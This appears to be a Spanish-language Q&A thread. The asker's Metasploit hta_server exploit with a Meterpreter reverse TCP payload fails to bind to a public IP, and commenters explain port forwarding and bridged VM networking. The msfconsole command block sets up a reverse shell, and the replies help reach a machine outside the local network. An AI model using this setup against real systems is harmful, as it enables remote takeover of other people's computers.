# Problema al crear un exploit en hta_server con Metasploit

Tags: hosting, server, networking, kali-linux

Estoy tratando de crear un exploit con metasploit a través de hta_server en mi máquina virtual con Kali linux de esta manera:

```
msfconsole
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.18
set srvhost <MyPublicIpHere>
set lport 4444
exploit
```

Y me sale este error:

```
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (<MyPublicIpHere>:8080).
```

Lo probé con mi IP local en lugar del público y funcionó, pero solo en mis dispositivos locales, lo estaba probando con la computadora de mi amigo, pero él no puede conectarse al servidor, por eso lo estoy probando con mi IP pública pero no funciona y no sé por qué. ¿Podría decirme cuál es el problema aquí? ¿Quizás es la configuración de la máquina virtual?

Comment: debes crear la redireccion de puertos en tu router hacia la ip de tu computadora, si tu proovedor de internet utiliza "modem router" administrado por ellos, debes pedirle que te haga la redireccion a tu "router propio en caso de tenerlo" o a una ip especifica "la de tu computadora"
tambien necesitas  necesitas validar que poses una ip publica fija y no eres parte de un cgnat... creo que en algunos paises se paga por este servicio saludos.

Comment: @Bryro Con redirección de puertos te refieres a tener los puertos abiertos? Tengo 2 puertos abiertos asignados a mi IP local de Kali, 4444 y 80, y he probado con ellos y sigue sin funcionar, y puedo confirmarte que mi IP publica es fija. La cosa es que es la misma que para mi Windows y para mi Kali linux, que esta en una maquina virtual.

Comment: con redireccion de puertos me refiero a crear una regla en el rotuer que le indique que si resive una conexion por X puerto la redirecciona a X ip por X puerto.... nota no se puede tener una misma ip para 2 equipos... si tu maquina es virtual debes cambiar la configuracion de red a "modo puente"

Comment: @Bryro Tengo la red de la maquina virtual como adaptador de puente, la IP local es distinta, el problema es la IP publica, que es la misma para los 2 dispositivos ¿Entonces cual crees que es el problema?

Comment: te explico, cuando haces una redireccion  de puerto `creas una regla`  que  `le indique al router` que cuando resiva una conexion de internet `ip publica` atravez de un puerto especifico `4444` la redirija a `192.168.1.18` atravez del puerto `4444` a eso se le conoce como redireccion o `port forwarding` saludos.

Comment: @Bryro Lo entiendo, pero para conectarte a un servidor con esa IP, la IP a la que te  conectas debería ser pública no? Tengo entendido que solo te puedes conectar a una IP local si estas en la misma red.

Comment: [Continuemos el debate en el chat](https://chat.stackexchange.com/rooms/128281/discussion-between-gian-lopez-and-bryro).